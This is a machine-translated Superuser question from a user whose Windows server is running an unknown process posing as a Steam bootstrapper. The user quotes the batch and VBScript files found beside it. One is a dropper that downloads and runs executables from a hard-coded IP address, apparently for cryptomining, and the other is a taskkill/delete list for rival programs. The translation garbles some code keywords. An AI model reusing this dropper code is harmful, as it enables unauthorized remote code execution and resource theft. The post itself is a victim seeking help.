windows - Cómo matar de forma permanente al cliente de vapor bootstrapper - Superusuario

Tengo la siguiente situación en mi administrador de tareas:

Tengo la siguiente situación en mi administrador de tareas:

No sé qué tipo de aplicación es, pero definitivamente no es el bootstrapper del cliente Steam porque no la instalé y tampoco puedo desinstalarla.

Si trato de averiguar qué tipo de aplicación es a través de este paso:

Veo algo como esto:

En la utilidad MS Config no encontré nada que se pareciera a secury.exe.

Cuando abro la ubicación del archivo, veo tres archivos:

m.bat, b.exe, 4.vbs.

A continuación se muestra el contenido de m.bat:

taskkill / f / t / im secury.exe c: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe taskkill / f / t / im MSASCui.exe taskkill / f / t / im SystemSettlngs.exe taskkill / f / t / im SystemSetting.exe taskkill / f / t / im Process.exe taskkill / f / t / im winlnlt.exe taskkill / f / t / im WindowsUpgrade.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im TrustedInstaller.exe del C: \ Windows \ System32 \ soiuos.exe del C: \ Windows \ Setup \ TrustedInstaller.exe del C: \ ProgramData \ kingsoft.exe del C: \ ProgramData \ expl0rer.exe del C: \ ProgramData \ ieplare.exe del C: \ ProgramData \ nssm.exe del C: \ ProgramData \ MSASCui.exe del C: \ Pro gramData \ SystemSettlngs.exe del C: \ ProgramData \ SystemSetting.exe del C: \ ProgramData \ Process.exe del C: \ ProgramData \ winlnlt.exe del C: \ ProgramData \ WindowsUpgrade.exe del C: \ ProgramData \ msdc.exe del C: \ ProgramData \ Fiddlere.exe del C: \ ProgramData \ shovst.exe del C: \ ProgramData \ lqrtqe.exe del C: \ ProgramData \ apkls.exe del C: \ ProgramData \ winlog.exe del C: \ ProgramData \ svchosts.exe del C: \ ProgramData \ win1ogins.exe del C: \ ProgramData \ shovsts.exe del C: \ ProgramData \ fcty.exe del C: \ ProgramData \ pool.exe del C: \ ProgramData \ pool2.exe del C: \ ProgramData \ pool3.exe

Luego va 4.vbs:

Set xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ s2.exe", 2 Set xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Establecer sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell"). Ejecute "C: \ ProgramData \ pool3.exe" CreateObject ( "WScript.Shell"). Ejecute "del C: \ ProgramData \ pool3.exe"

¿Qué puedo hacer para evitar que secury.exe abuse de los poderes informáticos de mi servidor?

PD He ejecutado Avast en mi computadora, pero no encontré nada malo.

Exe abuse de los poderes informáticos de mi servidor?